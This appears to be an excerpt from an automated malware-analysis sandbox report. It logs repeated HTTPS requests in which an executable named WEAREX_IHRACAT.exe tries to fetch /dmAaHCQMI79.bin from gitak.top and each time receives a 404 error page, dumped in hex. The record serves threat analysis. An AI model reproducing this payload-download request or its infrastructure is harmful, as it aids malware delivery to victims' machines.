                        2024-08-29 10:42:13 UTC1369INData Raw: 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b
                        Data Ascii: x;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:42:13 UTC915INData Raw: 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63
                        Data Ascii: 353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c
                        2024-08-29 10:42:13 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.11.2049788172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:42:24 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:42:24 UTC678INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:42:24 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 126
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qBfD0KFqKH%2FjuEPqXLGmfVRvGlYJ7xonfYKsjAuioIk3mZ0nD9XfU%2BsdBUtdQhBZsKK5pD6i%2FUtbiuoTH6VFzUzLjhCbEFyDCq93DypeKvLBwuv6cw7Or8rps0k%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babef268d5d2d0e-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:42:24 UTC691INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:42:24 UTC1369INData Raw: 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:42:24 UTC913INData Raw: 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e
                        Data Ascii: 3 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.
                        2024-08-29 10:42:24 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.11.2049789172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:42:34 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:42:35 UTC684INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:42:34 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 136
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qXfiXuYJ4hadXmEM7sONEP2m4MQat6SkERSgInyk3olB8%2FyTCkHB9wvTJz%2BgVW0ZWgn4wzpHY%2FvjdL3Nm%2Fo0G%2Fw%2BeVKfHB1ZsNgSW49r3D78mp37yvegGleUReY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babef686b810737-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:42:35 UTC685INData Raw: 62 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:42:35 UTC1369INData Raw: 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64
                        Data Ascii: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fad
                        2024-08-29 10:42:35 UTC918INData Raw: 36 2d 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32
                        Data Ascii: 6-2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12
                        2024-08-29 10:42:35 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:42:35 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.11.2049790172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:42:45 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:42:45 UTC678INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:42:45 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 147
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sKbW1Y4HPTxcwBPBIxIFuOUjsGbsPaM6IiXAd0gCMmTFMP9875X41jv%2FHIB2pY3JVz7Pai9QieunjV56GiHCRUmj5a0Az4aB3jgFZq%2BDhZf%2B8td4V0P0WY4tXPY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babefaa5a9a81b7-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:42:45 UTC691INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:42:45 UTC1369INData Raw: 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:42:45 UTC913INData Raw: 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e
                        Data Ascii: 3 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.
                        2024-08-29 10:42:45 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.11.2049791172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:42:55 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:42:56 UTC682INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:42:56 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 158
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ACR1CIV4FDjAhd2ezzKBo%2B%2BmCDuOxvybSxgwkG%2BbAd5HU8pi0XXVuQciCGeO3g2yq6%2BYdcmvE1zckugScTv%2Bv9j6Z6OLnGK86IWyAqmiaNLNoz6qlN7YsvRc8vA%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babefec688805f3-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:42:56 UTC687INData Raw: 62 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:42:56 UTC1369INData Raw: 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49
                        Data Ascii: 0px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeI
                        2024-08-29 10:42:56 UTC916INData Raw: 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35
                        Data Ascii: 2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h5
                        2024-08-29 10:42:56 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:42:56 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.11.2049792172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:43:06 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:43:06 UTC678INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:43:06 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 168
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U7Th%2F8Vb4dHHXArb7cx59BBVc87nvJf%2FkctRSGb54018w3bD7fVg3zI5%2Fec8AKupGUwgCcLMuJ0n9cCjXQASLw1zbGqJkvhSaaPE8zL3nDYgQoyt6XKX7OcSQdM%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf02e69c8172f-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:43:06 UTC691INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
